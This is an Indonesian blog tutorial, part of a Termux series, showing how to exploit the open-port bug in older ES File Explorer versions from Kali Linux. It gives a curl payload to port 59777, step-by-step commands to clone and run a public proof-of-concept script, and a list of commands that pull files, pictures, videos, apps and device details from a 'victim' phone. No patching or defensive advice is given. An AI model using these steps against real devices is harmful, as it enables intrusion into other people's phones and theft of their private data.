Tuesday, July 23, 2019

Cara Menggunakan Termux untuk Expert, Part 15 : Seni Menggabungkan Bug Aplikasi Android + Termux (Kali Linux)

Akhirnya sampai juga kita di part 15, tidak terasa sudah sejauh ini saya berbagi ilmu sama kalian, senangnya.

Dan karena saya tidak suka panjang lebar (pembaca setia cuman android pasti tau banget nih), mari kita langsung bahas materinya.

Beberapa waktu lalu saya sedang menggunakan termux + distro kali linux, untuk melakukan penstesting ke hape android, dan ketika sedang berjalan-jalan di github, saya menemukan tool untuk memanfaatkan bug di aplikasi ES File Explorer.

Cara Menggunakan Termux untuk Expert, Part 15 : Seni Menggabungkan Bug Aplikasi Android + Termux (Kali Linux)

Jadi bugnya ini adalah terdapat port yang terbuka, dan rupanya port tersebut sangat lah vulnerable, jadi tool ini memanfaatkan bug aplikasi tersebut untuk dapat melakukan pentesting atau menyusup ke dalam hape si korban.

Port yang terbuka :

angler:/ # netstat -ap | grep com.estrongs 
tcp6 0 0 :::59777 :::* LISTEN 5696/com.estrongs.android.pop

Payload yang di test :

curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777

Kemudian untuk cara memanfaatkan bugnya itu seperti ini :

Langkah 1 - Pertama download dulu aplikasi ES File Explorer (harus di bawah 4.1.9.7.4), silahkan pasang di hape agan atau di hape lain.

Download di sini

Langkah 2 - Buka termux, kemudian pasang kali linux melalui Anlinux.

Download aplikasi Anlinux melalui Google Playstore, kemudian ikuti tata caranya di situ.

Langkah 3 - Kalau sudah buka kali linux

./start-kali.sh

Langkah 4 - Jika sudah mari kita pasang dulu toolnya, ikuti perintah di bawah ini :

apt-get install python

apt-get install git

git clone https://github.com/fs0c131y/ESFileExplorerOpenPortVuln

cd ESFileExplorerOpenPortVuln

pip install -r requirements.txt

Langkah 5
- Kemudian untuk menggunakannya, agan buka dulu aplikasi ES File Managernya, kemudian baru bisa menggunakan perintah di bawah ini di dalam Termux kali-linux :

python poc.py --cmd PERINTAH/COMMANDS

contoh : python poc.py --cmd appPull


###################### # Available Commands # ######################

listFiles: List all the files
listPics: List all the pictures
listVideos: List all the videos
listAudios: List all the audio files
listApps: List all the apps installed
listAppsSystem: List all the phone apps
listAppsSdcard: List all the apk files in the sdcard
listAppsAll: List all the apps installed (system apps included)
getDeviceInfo: Get device info
appPull: Pull an app from the device. Package name parameter is needed
appLaunch: Launch an app. Package name parameter is needed
getAppThumbnail: Get the icon of an app. Package name parameter is needed

Hasil dari program python poc.py --cmd listFiles

Cara Menggunakan Termux untuk Expert, Part 15 : Seni Menggabungkan Bug Aplikasi Android + Termux (Kali Linux)

Hasil dari program python poc.py --cmd listVideos

Cara Menggunakan Termux untuk Expert, Part 15 : Seni Menggabungkan Bug Aplikasi Android + Termux (Kali Linux)

Gimana keren kan tutorialnya ?

Dan jika kalian ingin belajar lebih banyak seperti hal di atas, kalian bisa join ke grup telegram Cuman - Android, GRATIS : 

Link : 

Nyesel loh kalo gak nanya ;)
EmoticonEmoticon